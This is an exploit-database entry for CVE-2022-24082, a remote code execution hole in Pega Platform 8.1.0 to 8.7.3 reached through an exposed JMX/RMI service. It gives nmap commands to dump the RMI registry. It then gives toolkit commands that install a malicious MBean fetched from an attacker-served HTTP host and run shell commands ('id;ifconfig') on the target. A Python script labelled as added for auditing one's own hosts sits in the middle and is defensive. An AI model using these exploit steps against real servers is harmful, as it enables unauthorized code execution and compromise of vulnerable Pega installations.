# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution  
# Google Dork: N/A  
# Date: 20 Oct 2022  
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)  
# Vendor Homepage:  
# Software Link: Not Available  
# Version: 8.1.0 on-premise and higher, up to 8.7.3  
# Tested on: Red Hat Enterprise 7  
# CVE : CVE-2022-24082  
;Dumping RMI registry:  
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>  
;Extracting the dynamic TCP port number from the dump (it appears in the form @<PORT>)  
;Verifying that <PORT> is indeed open (it is given in the RMI dump, but it must actually be listening on the network as well):  
nmap -sT -sV -p <PORT> <IP Address>  
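;Added example for auditing your own hosts (not part of the original advisory or of the MOGWAI LABS toolkit): this Python script parses saved rmi-dumpregistry output and flags JMX stubs whose dynamic port still needs a reachability check from the network, even when the stub advertises a loopback address.  
;The sample output, function names and field names are constructed for illustration.  

```python
import re

# Constructed sample of `nmap --script rmi-dumpregistry` output (not from a real host).
SAMPLE = """\
9999/tcp open  java-rmi Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.0.1:41827
|     extends
|_      java.rmi.server.RemoteStub
"""

ENDPOINT = re.compile(r"@([^\s:]+):(\d{1,5})$")
JMX_STUB = "javax.management.remote.rmi.RMIServerImpl_Stub"


def parse_registry_dump(text):
    """Return one dict per name bound in the rmi-dumpregistry script block."""
    entries, in_block, name_indent = [], False, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            in_block = False                      # left the NSE output block
            continue
        body = " " + raw[2:] if raw.startswith("|_") else raw[1:]
        token, indent = body.strip(), len(body) - len(body.lstrip())
        if indent <= 1 and token.endswith(":"):   # header line of some NSE script
            in_block, name_indent = token == "rmi-dumpregistry:", None
        elif in_block and token:
            name_indent = indent if name_indent is None else name_indent
            match = ENDPOINT.match(token)
            if indent == name_indent:             # shallowest level: a bound name
                entries.append({"name": token, "classes": [], "host": None, "port": None})
            elif match:                           # "@host:port" endpoint of the stub
                entries[-1]["host"], entries[-1]["port"] = match.group(1), int(match.group(2))
            elif token != "extends":
                entries[-1]["classes"].append(token)
    return entries


def audit(text):
    """Flag JMX stubs whose dynamic port must be checked from the network."""
    findings = []
    for e in parse_registry_dump(text):
        if JMX_STUB in e["classes"] and e["port"] is not None:
            # A loopback address in the stub does not prove the port is unreachable.
            loopback = e["host"] == "localhost" or e["host"].startswith("127.")
            findings.append({"name": e["name"], "port": e["port"], "advertises_loopback": loopback})
    return findings
```

;Every port returned by audit() should be closed to untrusted networks at the firewall, whatever address the stub advertises.  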
;Exploitation requires:  
;- JVM  
;- MOGWAI LABS JMX Exploitation Toolkit (  
;- jython  
;Installing an MBean for remote code execution  
java -jar jython-standalone-2.7.2.jar --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666  
;Execution of commands id & ifconfig  
java -jar jython-standalone-2.7.2.jar --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"  
;More details: